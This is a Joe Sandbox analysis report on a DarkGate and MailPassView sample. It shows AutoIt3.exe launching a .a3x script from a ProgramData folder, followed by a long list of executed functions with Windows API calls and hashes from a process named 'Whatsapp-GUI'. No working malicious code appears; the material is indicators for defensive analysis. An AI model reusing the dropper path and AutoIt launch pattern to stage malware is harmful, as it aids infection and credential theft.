Start time:	15:53:27
Start date:	14/12/2024
Path:	C:\ProgramData\addbage\Autoit3.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\addbage\Autoit3.exe" C:\ProgramData\addbage\ffdghbb.a3x
Imagebase:	0xc40000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000009.00000002.2473661305.0000000004400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000009.00000002.2473753332.0000000004568000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000009.00000002.2473412421.0000000004344000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.2473753332.0000000004501000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.9%
Total number of Nodes:	281
Total number of Limit Nodes:	18

Executed Functions

Function 0A52CB10 Relevance: 9.1, Strings: 7, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJbq, xrefs: 0A52CE60
Te]q, xrefs: 0A52CDED
Haq, xrefs: 0A52CDA4
(aq, xrefs: 0A52CB40
Haq, xrefs: 0A52CD35
Haq, xrefs: 0A52CD57
Haq, xrefs: 0A52CBED

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID: (aq$Haq$Haq$Haq$Haq$TJbq$Te]q
API String ID: 0-902713110
Opcode ID: e898634bc39962d89053b26ba0d56b61021d94e654e37ab2291fcc07e6d6b0f6
Instruction ID: 44960cf11ca389d708eab4812d5e65a04e9e791e2a808072320d3a4fa5bd2174
Opcode Fuzzy Hash: e898634bc39962d89053b26ba0d56b61021d94e654e37ab2291fcc07e6d6b0f6
Instruction Fuzzy Hash: 0FE1BC307006558FD719DF39D454A6EBBF6BF8A210F1584A9E446DB3A2DB30E806CB91

Function 0A5258D0 Relevance: 5.3, Strings: 4, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 0A525A19
(&]q, xrefs: 0A525BA1
, xrefs: 0A52596C
Haq, xrefs: 0A525A45

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID: $(&]q$(aq$Haq
API String ID: 0-1574058083
Opcode ID: 6272e072b5a1fc3aa003c0e57bd201ff2870f7a55a7ed1ba0130bb947734022c
Instruction ID: 8d4609ddb119c260e336f93b485b73b61af664f90aec93e7ce5044394d509688
Opcode Fuzzy Hash: 6272e072b5a1fc3aa003c0e57bd201ff2870f7a55a7ed1ba0130bb947734022c
Instruction Fuzzy Hash: C2917071F002199FDB58DF69C4546AFBBF6FFC9310B108429E806EB294EB399905CB94

Function 0A520AB0 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: bce2ec1bf4ddc80e1c79b33c00b9b32b47470c65fe7a96fa14fa65cf067a69b7
Instruction ID: 5fc3d918950b66c98555cef50cc1295dced06055e1223900638ca0a12dbe3f35
Opcode Fuzzy Hash: bce2ec1bf4ddc80e1c79b33c00b9b32b47470c65fe7a96fa14fa65cf067a69b7
Instruction Fuzzy Hash: 8BF16A30A012199FEB14DFA9C944BADBBF1FF89314F158568E409AB2E5DB74AC45CF80

Function 091EB75A Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a99306e21e6f2c2bcdd23b2a9632d077da99b230eae1ed4444573909db62dbb6
Instruction ID: 26ed5380f639bab44fc7d6ffff8e8805b10493e9bf29cd19aa2a5993b17ce71f
Opcode Fuzzy Hash: a99306e21e6f2c2bcdd23b2a9632d077da99b230eae1ed4444573909db62dbb6
Instruction Fuzzy Hash: 7AA19274A413198FCB58DF69D980B9DB7F2BF89304F2191A9D409AB365DB30AE81CF41

Function 0190AD48 Relevance: 1.7, APIs: 1, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0190AF9E

Memory Dump Source

Source File: 00000000.00000002.3099850594.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1900000_Whatsapp-GUI.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 41c8c46ea183e6ffeeba853ac5d60e5395d5f8f3b899c9ebb97da3be4c66e58f
Instruction ID: 22c2b76c7c79047b96363a6044dc6381ba80be734e9748fa149cbb28a04ac578
Opcode Fuzzy Hash: 41c8c46ea183e6ffeeba853ac5d60e5395d5f8f3b899c9ebb97da3be4c66e58f
Instruction Fuzzy Hash: 58814570A00B058FDB25DF29D44479ABBF5FF88314F008A2DD58ADBA91DB35E849CB91

Function 0190590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 019059C9

Memory Dump Source

Source File: 00000000.00000002.3099850594.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1900000_Whatsapp-GUI.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fb7ddf0b20607c55739148436673ec8ca9e636d47ed03364947ce7d172525a74
Instruction ID: a2047c0ffabb0253d6ec12c67aa3263a95ecea14ec8a96a894bf6973b9dd4d87
Opcode Fuzzy Hash: fb7ddf0b20607c55739148436673ec8ca9e636d47ed03364947ce7d172525a74
Instruction Fuzzy Hash: 6241F0B1C00719CEDB25DFA9C884BDDBBF5BF49304F20806AD408AB255DB756986CF90

Function 019044B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 019059C9

Memory Dump Source

Source File: 00000000.00000002.3099850594.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1900000_Whatsapp-GUI.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 214a28b6c1d33951ca52301a8f2466b3fffd4eea0bdc73a6e53962158baab972
Instruction ID: 2fdbbd811215ff44fbda59b375f4b977fcb2d7744cd32058d19cea4ff6d0c3a4
Opcode Fuzzy Hash: 214a28b6c1d33951ca52301a8f2466b3fffd4eea0bdc73a6e53962158baab972
Instruction Fuzzy Hash: DD41DFB1C00719CFDB25DFA9C884B9DBBF5BF49304F20806AD418AB255DB756986CFA0

Function 0A521070 Relevance: 1.6, APIs: 1, Instructions: 77
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 0A5210E0

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: d08b656b1556143c20b238fe98a796eaec490ca31459c47afb065787b1ffa453
Instruction ID: 4f7b57da74e3d06706e67752d034763362ab48eebcc259fc5ae556184dbdda96
Opcode Fuzzy Hash: d08b656b1556143c20b238fe98a796eaec490ca31459c47afb065787b1ffa453
Instruction Fuzzy Hash: 4A217AB5804789CFCB10CFAAC4446EEBBF4FF09310F10815AD555A7252C339A545CFA5

Function 091ECDA0 Relevance: 1.6, APIs: 1, Instructions: 66
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 091ECE25

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e33ac23d0b9d7a9dcffc99a0954d85dec279bcb29027cc1de145e12c4ac9faef
Instruction ID: 6582d1184a4e09de53abfb21425f0ae6c695914a6c1a109123774bd2aeb72a66
Opcode Fuzzy Hash: e33ac23d0b9d7a9dcffc99a0954d85dec279bcb29027cc1de145e12c4ac9faef
Instruction Fuzzy Hash: 382179B28043898FDB11CF99C885BDEBFF4EF4A310F15849AD454A7252C339A948CFA1

Function 0190D21C Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0190D5F6,?,?,?,?,?), ref: 0190D6B7

Memory Dump Source

Source File: 00000000.00000002.3099850594.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1900000_Whatsapp-GUI.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f2a215b072ce75b9a693b71ed2a42d94b079b2b3ebb697b532217b2f90f17ce6
Instruction ID: 0394fbdf2af153adaede7fbce7b16a333322844e5825dcff55955ad5a1e4f2fc
Opcode Fuzzy Hash: f2a215b072ce75b9a693b71ed2a42d94b079b2b3ebb697b532217b2f90f17ce6
Instruction Fuzzy Hash: CA21E3B59002489FDB10DFDAD984AEEFBF9EB48310F14841AE918A3350D379A944CFA4

Function 091E8630 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 091E86B4

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 8b3c32c75fcdec22b93d45bdd15e1485c944d047fcbede334c405f2f775ea53e
Instruction ID: 3d1684f89cb7377274f98d548a36fe7cfe07918e6dc747727237181cb4c39dd5
Opcode Fuzzy Hash: 8b3c32c75fcdec22b93d45bdd15e1485c944d047fcbede334c405f2f775ea53e
Instruction Fuzzy Hash: E52123B2E006098FDB14CF9AC984AEEFBF5FB48314F54806AE519A7250D338A544CBA4

Function 0190D629 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0190D5F6,?,?,?,?,?), ref: 0190D6B7

Memory Dump Source

Source File: 00000000.00000002.3099850594.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1900000_Whatsapp-GUI.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1ba84c3ce9ca1b6e186560846880b4140a68645fe8cb8e25e753974505d9c20a
Instruction ID: e31c9b43065baf3a33155104cb9a1cf1618c041b7b0780a4e9333d7aaa4e42d2
Opcode Fuzzy Hash: 1ba84c3ce9ca1b6e186560846880b4140a68645fe8cb8e25e753974505d9c20a
Instruction Fuzzy Hash: 4621E6B59002099FDB10CF9AD984ADEFFF9FB48310F14841AE918A3350D379A944CFA5

Function 0AE10530 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 0AE105A9

Memory Dump Source

Source File: 00000000.00000002.3104452807.000000000AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae10000_Whatsapp-GUI.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 8bdd0b4ede969185900f1538d920438b8ba911b11ef92a1f6e1b000291f3acc8
Instruction ID: 6496292b7f4628441d17466a31734212289a2e31e9a9ae3193762a8ee8626a5e
Opcode Fuzzy Hash: 8bdd0b4ede969185900f1538d920438b8ba911b11ef92a1f6e1b000291f3acc8
Instruction Fuzzy Hash: 8B2138B19002198FDB14DF9AC885BEEFBF5FB88314F14842AD459A3350C778A945CFA1

Function 091E8638 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 091E86B4

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 298d56e20697feabe71145f97c1b29b5389538a6fcf64fa549b75a243c3b782d
Instruction ID: f045ac0d6c8abc21c8a613470d3330f52c87ff0b8ceb16db4d5a886992a6d97b
Opcode Fuzzy Hash: 298d56e20697feabe71145f97c1b29b5389538a6fcf64fa549b75a243c3b782d
Instruction Fuzzy Hash: F92115B1D017098FDB10CF9AC984ADEFBF4FB48314F54806AE519A3350D378A544CBA4

Function 0AE10538 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 0AE105A9

Memory Dump Source

Source File: 00000000.00000002.3104452807.000000000AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae10000_Whatsapp-GUI.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 7c1acaf2d42f7d298120b38af2414e9f965b2a1062b97e97e2a2798cc82082f1
Instruction ID: 0a0560d1f12bedf5c7079b419543936f21a2f193d9fd530fd2ca1b74dbba0410
Opcode Fuzzy Hash: 7c1acaf2d42f7d298120b38af2414e9f965b2a1062b97e97e2a2798cc82082f1
Instruction Fuzzy Hash: 922138B19002198FDB14DF9AC884BEEFBF5FB88314F14842AD458A3250D778A945CFA5

Function 0AE10A32 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 0AE10AB5

Memory Dump Source

Source File: 00000000.00000002.3104452807.000000000AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae10000_Whatsapp-GUI.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 63d1c60ef902183f3e1d3509a8f87ccb8955214f7b606cd269d076a3ac53395f
Instruction ID: a3d5d50f171a9d286464fd9f4f0b7c73990f79967d7c3f44e3e421a237a116bb
Opcode Fuzzy Hash: 63d1c60ef902183f3e1d3509a8f87ccb8955214f7b606cd269d076a3ac53395f
Instruction Fuzzy Hash: 462102B68013599FCB14CF9AC884ADEBBB5FB48314F15852AD918A7210C379A984CFA0

Function 091E5889 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 091E58FA

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 742f3b2bca6e06b3a2fbbcbc039769c7f7530894de5ec3feea7c1aad50035ae5
Instruction ID: aff3cf147853d5e1b8d5f1f21f19b803009b29a2684a3897a35f87c9d64c225f
Opcode Fuzzy Hash: 742f3b2bca6e06b3a2fbbcbc039769c7f7530894de5ec3feea7c1aad50035ae5
Instruction Fuzzy Hash: AB2133B2D006098FDB14CF9AC444AEEBBF5EB88324F10842AE819A7210C339A545CFA4

Function 0AE10A38 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,00000000,00000000,?), ref: 0AE10AB5

Memory Dump Source

Source File: 00000000.00000002.3104452807.000000000AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae10000_Whatsapp-GUI.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: eb01032ee1019e8bf942e589067410e0edb1f2ce405b39141df90b544a18e459
Instruction ID: ec48f4a04ba205a3c9a17581e2acb0f0146d9c579e3ee72b2965d38e565c0c0b
Opcode Fuzzy Hash: eb01032ee1019e8bf942e589067410e0edb1f2ce405b39141df90b544a18e459
Instruction Fuzzy Hash: 7121E3B68013599FCB10CF9AD884ADEFBB5FB48314F15852ED519A7200C379A584CFA4

Function 0A521298 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0A521305

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 80a22680a34774a7c160a3fd3da26266673c0be11bd71f9f2a43e1cdc494cd64
Instruction ID: a5c7e39f9bae2e6e0cc4695b1dc93b6b36e288a5d867d171decd36aaa1534e45
Opcode Fuzzy Hash: 80a22680a34774a7c160a3fd3da26266673c0be11bd71f9f2a43e1cdc494cd64
Instruction Fuzzy Hash: 2B1123B28002499FDB10CF9AD844BDEFBF8FB58314F14842AE958A3240C378A544CFA5

Function 091E5890 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 091E58FA

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: d84714fa3507457d3e1ea420a8149bdcc05d7f150e956d17a75b608b2a3e6899
Instruction ID: ab3336dcecd3f254bc7ff21d12fd384e7097b44931e8f769e2f1feb8652a6b48
Opcode Fuzzy Hash: d84714fa3507457d3e1ea420a8149bdcc05d7f150e956d17a75b608b2a3e6899
Instruction Fuzzy Hash: 4B1114B6D006498FDB10CF9AC444BDEFBF5EB88324F14842AE858A3250D339A545CFA5

Function 0AE1097A Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 0AE109E7

Memory Dump Source

Source File: 00000000.00000002.3104452807.000000000AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae10000_Whatsapp-GUI.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a8a8c6b3f6a80b7ceda22ea519e6c42440490118d6682f4145e7428ab2ff66ea
Instruction ID: 05637d6bc96030e261d3fa4b5c9eff7fe195c5cdad1c45237f725526be4241cb
Opcode Fuzzy Hash: a8a8c6b3f6a80b7ceda22ea519e6c42440490118d6682f4145e7428ab2ff66ea
Instruction Fuzzy Hash: D3113DB58002498FDB10DF9AC485BEEBFF5EF48320F14845AD558A3251D739A985CFA4

Function 0A521078 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 0A5210E0

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 2741d81e5d8718c0bdf98c33edc76a974e899aeedb2bda4cae61bbdc5ab4de18
Instruction ID: 5ca40c3f9efdbf61f2bf1f019b8d6641f3b3ead00a69e650e0b42469b3e7d650
Opcode Fuzzy Hash: 2741d81e5d8718c0bdf98c33edc76a974e899aeedb2bda4cae61bbdc5ab4de18
Instruction Fuzzy Hash: 9C1104B5C002499FDB10CF9AD844BDEFBF8FB48320F10842AE958A3250C379A544CFA5

Function 0A521762 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0A520DD7), ref: 0A5217C5

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 01b132beb64fa82078c3f486218139e8b540bff7b7248a1ab5c39d914fab1290
Instruction ID: 4eb09c39606a20c3f7311a28e657a0d56edaa81b2e490d3764ac412cc3c9646b
Opcode Fuzzy Hash: 01b132beb64fa82078c3f486218139e8b540bff7b7248a1ab5c39d914fab1290
Instruction Fuzzy Hash: 161143B5C046488FDB10CF9AD884BDEBFF4BB8A314F14855AD419B3661C338A545CFA5

Function 0A5212A0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0A521305

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 670b6b76ee3e09796b3115c3e00ae8a109965a0cc7b31d205256fda7f4bb933e
Instruction ID: dc251bc9de9714c1d9b7563003747d2b709fba30d7ca0da60958fe9f02f37f96
Opcode Fuzzy Hash: 670b6b76ee3e09796b3115c3e00ae8a109965a0cc7b31d205256fda7f4bb933e
Instruction Fuzzy Hash: 0E1104B58003499FDB10CF9AD844BDEFBF8FB49310F10842AE558A3640C378A544CFA5

Function 0AE10980 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 0AE109E7

Memory Dump Source

Source File: 00000000.00000002.3104452807.000000000AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae10000_Whatsapp-GUI.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6a601b214a36aeb962106329df74193e1997d9495bb7534e2a40722817917fb6
Instruction ID: fd4135df0192b361f17e2530e0f2e87ffbe6a95f9e3e54d2769ff04f3e11d5c4
Opcode Fuzzy Hash: 6a601b214a36aeb962106329df74193e1997d9495bb7534e2a40722817917fb6
Instruction Fuzzy Hash: 09110AB68006598FDB10DF9AC545BEEBBF4EB49320F14846AD558A3241D338A984CFA5

Function 091EB1D9 Relevance: 1.5, APIs: 1, Instructions: 48timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,01926428,?,?,?,?,?,?,091EB090,00000000,00000000,?), ref: 091EB23D

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: fcf19c468af6cda0bcaea77597564199d2371e954e52c76d2c5476fd4cab3bdb
Instruction ID: 5bfb54d75a037d8f1b11f5c9c6e078fdc5560fd25fe37b4d1c5773d57d6fbd88
Opcode Fuzzy Hash: fcf19c468af6cda0bcaea77597564199d2371e954e52c76d2c5476fd4cab3bdb
Instruction Fuzzy Hash: C51122B59002098FCB10DF9AD888BEEFBF8FB48314F20841AE519A3210C379A544CFA0

Function 091ECDC8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 091ECE25

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: af3a5e2f61fcc2bdacf6a1ec4d6fe65c69d9f2e12121fa210403eb49c5e5310a
Instruction ID: d7229544fa361ed42db0062c1ddffae27d3bdddbde82e762563ba637bb5ef528
Opcode Fuzzy Hash: af3a5e2f61fcc2bdacf6a1ec4d6fe65c69d9f2e12121fa210403eb49c5e5310a
Instruction Fuzzy Hash: 801103B58007499FDB10CF9AC945BEEFFF8EB48324F14841AE558A3250D379A984CFA5

Function 0A52BEE0 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0A52BF45

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b5873dccdc9e863d646f731639b8de5ca6c770eb23ca3efe18006e3187e959f6
Instruction ID: 33e7f05f21dc8c1aff94fcf26ce5b89ae58778dffc6118fa670ec370cb9f7122
Opcode Fuzzy Hash: b5873dccdc9e863d646f731639b8de5ca6c770eb23ca3efe18006e3187e959f6
Instruction Fuzzy Hash: B91110B58002499FDB10DF9AC884BDEBFF8FB49320F24844AE558A3250C379A544CFA1

Function 0190AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0190AF9E

Memory Dump Source

Source File: 00000000.00000002.3099850594.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1900000_Whatsapp-GUI.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: eed91e056941dced471ec237dab0d52a166ddae3573bab4fe049bc906cd3d926
Instruction ID: 82d11a52dd8be8a22dc37f78c7ffaa890a0a8b07b311229b16d1689dd2b1f491
Opcode Fuzzy Hash: eed91e056941dced471ec237dab0d52a166ddae3573bab4fe049bc906cd3d926
Instruction Fuzzy Hash: 9E1110B6C003498FDB10CF9AC444ADEFBF8EF88324F10841AD919A7250C379A545CFA1

Function 091E97D8 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,01926428,?,?,?,?,?,?,091EB090,00000000,00000000,?), ref: 091EB23D

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: e6a838f4327fe25aa99fc929fc9ffb5826bfd92b51cb49c404d0c38610388f25
